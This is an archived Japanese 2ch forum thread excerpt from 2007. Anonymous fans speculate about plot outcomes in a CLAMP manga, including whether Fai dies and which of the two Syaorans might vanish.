113 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:54:11 ID:IDnehphm
>>112
誰か一人が不幸になるっていったんだったら
不幸になるんじゃないの?
「メイン」の誰かが?実際に話を聞いたんじゃないからわからんけど
ファイは死なないと思うんだけどね。個人的には
あんなに死ぬ死ぬ言うキャラは死なないんじゃないかな、結局。
やっぱどっちかのしゃおらんが消えるんだろうな。
融合するにしてもどっちかが消えるんじゃ?
(個人的に融合はないと思うけどね。
もう心は真に戻って性格がオリジナルになってるだけだから)
真のほうもクロウ国のある世界出身みたいだし
国王のクロウと知り合いみたいだしな。
二人ともクロウ国のある世界に帰って存在するのはへんだろやっぱ!!
例のドッペルゲンガーてやつだよな?双子じゃない限り・・・

114 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:54:19 ID:IBTNS6Rw
ファイの真の望みが死にたいだった場合、メイン面子はその意思を汲み取り悲しみながらも幸せに…
となりそうなのがクランプの幸福論だが、ここはがつんと誰かが止めてやってくれ
そういう今までにないクランプの話しの展開が欲しい

115 :名無しさんの次レスにご期待下さい:2007/01/09(火) 15:19:23 ID:uKpepMaA
>>113
ケツアゴとかじゃやっぱりダメか…?
望み(完全に悪役な望みじゃなかったけど)、叶わずあぼんとか。
今までずっとあの4人と1モコナを見てきたし、
真小狼も不憫ないい子なので、誰かが不幸なのは見ていられない。

>>114
禿同

33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)